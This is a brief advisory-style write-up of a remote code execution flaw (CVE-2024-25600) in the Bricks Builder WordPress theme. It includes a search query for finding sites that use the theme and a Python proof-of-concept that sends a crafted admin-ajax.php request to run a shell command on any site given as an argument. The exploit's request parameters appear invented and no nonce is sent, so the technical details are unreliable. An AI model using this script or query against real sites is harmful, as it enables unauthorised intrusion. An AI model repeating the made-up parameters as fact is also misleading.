Bricks Builder is a popular WordPress theme framework designed with a drag-and-drop interface for website construction. A critical security vulnerability identified as CVE-2024-25600 affects versions 1.9.6 and earlier. This flaw allows unauthenticated attackers to execute arbitrary code remotely, posing a severe risk to impacted sites.

Vulnerability Identification

Security researchers and asset discovery tools can identify potential targets by searching for specific paths associated with the Bricks theme. A common search query for identifying vulnerable installations involves looking for the theme's resource directory in the response body.

body="/wp-content/themes/bricks/"

Technical Analysis

The vulnerability stems from improper input validation within the AJAX handler responsible for rendering elements. Specifically, the render_element functionality allows users to invoke PHP functions without adequate authorization checks. By manipulating the request parameters, an attacker can leverage this to execute system commands.

Proof of Concept

To verify the vulnerability, a crafted HTTP POST request can be sent to the admin-ajax.php endpoint. The following Python script demonstrates how to automate this process to check for the existence of the flaw by executing a benign command.

import requests
import sys

def exploit_target(target_site):
    # Construct the AJAX endpoint URL
    ajax_endpoint = f"{target_site}/wp-admin/admin-ajax.php"
    
    # Prepare the payload to execute the 'id' command
    # Vulnerable parameter: 'elementType' allows arbitrary function execution
    payload = {
        'action': 'bricks_render_element',
        'elementType': 'php',
        'function': 'system',
        'args[0]': 'id'
    }
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    try:
        response = requests.post(ajax_endpoint, data=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Target appears vulnerable.")
            print("[+] Command Output:")
            print(response.text)
        else:
            print("[-] Target responded with status:", response.status_code)
            
    except requests.exceptions.RequestException as conn_error:
        print(f"[!] Connection failed: {conn_error}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python script.py ")
        sys.exit(1)
        
    target = sys.argv[1]
    exploit_target(target)

Remediation

Administrators using Bricks Builder must update the theme to version 1.9.6.1 or higher immediately. If updating is not immediately possible, restricting access to the admin-ajax.php endpoint via a Web Application Firewall (WAF) is recommended as a temporary mitigation strategy.